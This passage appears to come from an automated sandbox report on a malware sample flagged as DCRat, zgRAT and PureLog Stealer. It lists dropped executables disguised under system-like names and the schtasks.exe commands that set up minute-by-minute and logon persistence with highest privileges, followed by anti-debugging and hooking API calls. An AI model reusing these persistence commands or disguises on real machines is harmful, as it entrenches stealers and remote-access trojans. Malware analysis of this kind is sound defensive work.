                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 74%, ReversingLabs
                                                                                            Has exited:true

                                                                                            Target ID:25
                                                                                            Start time:13:14:54
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Local\Temp\cnvwov.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\cnvwov.EXE"
                                                                                            Imagebase:0x6c0000
                                                                                            File size:550'912 bytes
                                                                                            MD5 hash:F50B390915773B882776BB3EF569C708
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 68%, ReversingLabs
                                                                                            Has exited:true

                                                                                            Target ID:26
                                                                                            Start time:13:14:54
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:27
                                                                                            Start time:13:14:55
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe"
                                                                                            Imagebase:0xe10000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:28
                                                                                            Start time:13:14:55
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff7b4ee0000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:29
                                                                                            Start time:13:15:01
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Imagebase:0x1b0000
                                                                                            File size:75'264 bytes
                                                                                            MD5 hash:3C30D3B3706B97A2A0638180BB159B44
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:30
                                                                                            Start time:13:15:02
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Update.exe"
                                                                                            Imagebase:0x1e0000
                                                                                            File size:75'264 bytes
                                                                                            MD5 hash:3C30D3B3706B97A2A0638180BB159B44
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:31
                                                                                            Start time:13:15:19
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" "
                                                                                            Imagebase:0x410000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:32
                                                                                            Start time:13:15:19
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:33
                                                                                            Start time:13:15:19
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\agentwebreviewDhcp/portBrowserweb.exe"
                                                                                            Imagebase:0x3e0000
                                                                                            File size:2'383'872 bytes
                                                                                            MD5 hash:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000021.00000000.2338852988.00000000003E2000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\agentwebreviewDhcp\portBrowserweb.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\agentwebreviewDhcp\portBrowserweb.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 65%, ReversingLabs
                                                                                            Has exited:true

                                                                                            Target ID:34
                                                                                            Start time:13:15:22
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\System.exe'" /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:35
                                                                                            Start time:13:15:23
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:36
                                                                                            Start time:13:15:23
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:37
                                                                                            Start time:13:15:23
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline"
                                                                                            Imagebase:0x7ff7ceb40000
                                                                                            File size:2'759'232 bytes
                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:38
                                                                                            Start time:13:15:23
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:40
                                                                                            Start time:13:15:23
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP"
                                                                                            Imagebase:0x7ff7734f0000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:41
                                                                                            Start time:13:15:24
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Program Files\Windows Mail\System.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Windows Mail\System.exe"
                                                                                            Imagebase:0x140000
                                                                                            File size:2'383'872 bytes
                                                                                            MD5 hash:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 65%, ReversingLabs
                                                                                            Has exited:false

                                                                                            Target ID:42
                                                                                            Start time:13:15:24
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Program Files\Windows Mail\System.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Windows Mail\System.exe"
                                                                                            Imagebase:0xf70000
                                                                                            File size:2'383'872 bytes
                                                                                            MD5 hash:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:43
                                                                                            Start time:13:15:24
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline"
                                                                                            Imagebase:0x7ff7ceb40000
                                                                                            File size:2'759'232 bytes
                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:44
                                                                                            Start time:13:15:24
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:45
                                                                                            Start time:13:15:24
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp" "c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP"
                                                                                            Imagebase:0x7ff7734f0000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:46
                                                                                            Start time:13:15:25
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline"
                                                                                            Imagebase:0x7ff7ceb40000
                                                                                            File size:2'759'232 bytes
                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:47
                                                                                            Start time:13:15:25
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:48
                                                                                            Start time:13:15:25
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1F7E.tmp" "c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP"
                                                                                            Imagebase:0x7ff7734f0000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:49
                                                                                            Start time:13:15:27
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:50
                                                                                            Start time:13:15:27
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:51
                                                                                            Start time:13:15:27
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:52
                                                                                            Start time:13:15:27
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 11 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:53
                                                                                            Start time:13:15:27
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBF" /sc ONLOGON /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:54
                                                                                            Start time:13:15:28
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "ybWXCCKXKhIvlNpBFy" /sc MINUTE /mo 7 /tr "'C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:55
                                                                                            Start time:13:15:28
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\agentwebreviewDhcp\WmiPrvSE.exe'" /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                              Execution Graph

                                                                                              Execution Coverage:16.5%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:15%
                                                                                              Total number of Nodes:20
                                                                                              Total number of Limit Nodes:1
                                                                                              execution_graph 8075 7ffaac4777c1 8076 7ffaac4777df CheckRemoteDebuggerPresent 8075->8076 8078 7ffaac47787f 8076->8078 8095 7ffaac4787bd 8096 7ffaac4787c7 8095->8096 8097 7ffaac478785 8096->8097 8098 7ffaac479642 RtlSetProcessIsCritical 8096->8098 8099 7ffaac4796a2 8098->8099 8079 7ffaac478d2a 8080 7ffaac478d2f 8079->8080 8083 7ffaac478858 8080->8083 8084 7ffaac478807 RtlSetProcessIsCritical 8083->8084 8086 7ffaac478d48 8084->8086 8087 7ffaac479d78 8088 7ffaac479d81 SetWindowsHookExW 8087->8088 8090 7ffaac479e51 8088->8090 8091 7ffaac4794c8 8092 7ffaac4794d1 8091->8092 8092->8091 8093 7ffaac479642 RtlSetProcessIsCritical 8092->8093 8094 7ffaac4796a2 8093->8094

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6$6$6$6
                                                                                              • API String ID: 0-3214027553
                                                                                              • Opcode ID: 53db1929273e946b7bdcd71d99f79ab48d132801fc73c5abec88f241d6f62888
                                                                                              • Instruction ID: 386d62625a140059a7d97b003b0ffbd0219d1c73a0b76e6446f0cf4902d6a14a
                                                                                              • Opcode Fuzzy Hash: 53db1929273e946b7bdcd71d99f79ab48d132801fc73c5abec88f241d6f62888
                                                                                              • Instruction Fuzzy Hash: 7DB1C4A0B1DA59CFFB98EB3C845967977D1FF99304F04817AD04EC3692DE28E8064785

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 42ac605a694be864182050dcd17a4951d04bb86e2f3c2f5a65a7978824af48af
                                                                                              • Instruction ID: 7107babb632557dc90b2b9bc9b7e3709a6161a96b8f0883a4413e6589e2e0bbc
                                                                                              • Opcode Fuzzy Hash: 42ac605a694be864182050dcd17a4951d04bb86e2f3c2f5a65a7978824af48af
                                                                                              • Instruction Fuzzy Hash: 53829470B5D91A8FFB94EB78C49AA7972D2FF99304F508578D01EC32C2DD28E8468785
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckDebuggerPresentRemote
                                                                                              • String ID:
                                                                                              • API String ID: 3662101638-0
                                                                                              • Opcode ID: e0a02923e5382c8df93c76814c0ddb7ae836b63de67037baad3a780184ef1bb2
                                                                                              • Instruction ID: 4c76b8734686ff791afe1c7f5c5c0ac0a7eace20810a6e95bf02e34454fd6aef
                                                                                              • Opcode Fuzzy Hash: e0a02923e5382c8df93c76814c0ddb7ae836b63de67037baad3a780184ef1bb2
                                                                                              • Instruction Fuzzy Hash: 7331237190871C8FDB58DF58C84ABE97BE0FF65321F04426BD48AD7252DB34A846CB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: 090a5b40b9a3ba7b4612283adeae41b8612054942b5a3b47ae5b61ba84764261
                                                                                              • Instruction ID: b30add26bc90768a30d574efef1016c9edaa5df26bdac4607c3aaab1666402ed
                                                                                              • Opcode Fuzzy Hash: 090a5b40b9a3ba7b4612283adeae41b8612054942b5a3b47ae5b61ba84764261
                                                                                              • Instruction Fuzzy Hash: DC51C05160E7C50FE78697B898696657FE6DF8B220B0941FFE08DCB1A3DD588C0AC352
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f5cf419e89cff9442d8e51dfe9fa6c625f59c9c7398d48a131c7cba21dfa16d0
                                                                                              • Instruction ID: 5f6cd22337f9a5265a0f2cd2ca362a1222378719411a10eea3584e56e1d74ae7
                                                                                              • Opcode Fuzzy Hash: f5cf419e89cff9442d8e51dfe9fa6c625f59c9c7398d48a131c7cba21dfa16d0
                                                                                              • Instruction Fuzzy Hash: 45F19330908A8D8FFBA8DF28D8597E937E1FF55310F04826EE84DC7291CB3499458B81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6bbb1224f9a87983c88a1fd8fd70d5564eed497f7ebe61b94698d8246eb9ee4e
                                                                                              • Instruction ID: e271a0c7808299206b080e6c574b1cdef10f80dbb3b46ccb2a68fb0a460441eb
                                                                                              • Opcode Fuzzy Hash: 6bbb1224f9a87983c88a1fd8fd70d5564eed497f7ebe61b94698d8246eb9ee4e
                                                                                              • Instruction Fuzzy Hash: 0DE1A330918A4E8FFBA8DF28C85A7E977D2FB55310F04826ED84DC7291DB74A9458BC1

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M_^$M_^
                                                                                              • API String ID: 0-615062493
                                                                                              • Opcode ID: f4558c89c711a3b1ec7c1f588076b8e1d8c43b87ed0317eeccd650ee680501a2
                                                                                              • Instruction ID: e9cfb5f485d4df90e6336a8a31c01246403722e0fede9ef7cf6e810d1d29e45b
                                                                                              • Opcode Fuzzy Hash: f4558c89c711a3b1ec7c1f588076b8e1d8c43b87ed0317eeccd650ee680501a2
                                                                                              • Instruction Fuzzy Hash: DFA102B2C0E6D6CFF35587689C5E2B57FD0FF12314B1881BED08D97183E929980A8796

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2767399172.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7ffaac470000_HaLCYOFjMN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M_^$M_^
                                                                                              • API String ID: 0-615062493
                                                                                              • Opcode ID: b893407658bfdbfd40669dbfed24a5a4a12bf9d553bde6c51c40bfb0642aa386
                                                                                              • Instruction ID: 1343dfdb9d9ab9da2ad3cfdeb5009dfff0edb6d5de58b1a67d6c3c5d83e20cea
                                                                                              • Opcode Fuzzy Hash: b893407658bfdbfd40669dbfed24a5a4a12bf9d553bde6c51c40bfb0642aa386
                                                                                              • Instruction Fuzzy Hash: C46137B180E795CFF719CB68885D6B9BFE0EF52214F0881BED08D97583E924990987D2

                                                                                              Control-flow Graph

